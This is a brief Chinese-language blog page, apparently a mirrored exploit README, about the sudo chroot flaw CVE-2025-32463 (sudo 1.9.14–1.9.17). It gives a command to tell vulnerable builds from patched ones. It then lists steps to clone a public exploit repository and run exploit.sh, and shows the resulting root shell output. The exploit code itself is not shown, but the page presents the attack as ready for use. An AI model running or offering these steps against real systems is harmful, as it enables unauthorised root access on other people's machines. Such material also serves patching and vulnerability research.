Sudo CVE-2025-32463 未受信控制域功能包含漏洞利用详解

本文详细分析了Sudo项目中的CVE-2025-32463漏洞,该漏洞允许通过未受信控制域包含功能实现权限提升,影响sudo 1.9.14至1.9.17版本,CVSS评分高达9.3。

CVE-2025-32463 漏洞利用

这是针对CVE-2025-32463的漏洞利用代码

受影响版本

大多数Linux发行版中sudo 1.9.141.9.17(所有p修订版)的易受攻击构建都受到影响。

安全页面

快速漏洞检查 

1
2
3
4
5
6
7
8

# 易受攻击的sudo会给出这样的提示
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory

# 已修补的sudo会给出这样的提示
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root

测试漏洞利用 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git

$ cd CVE-2025-32463

$ chmod +x exploit.sh

$ ./exploit.sh

[+] 通过sudo启动漏洞利用...

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)

了解漏洞详情

查看Rich Mirch发布的原始博客 - 点击这里

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次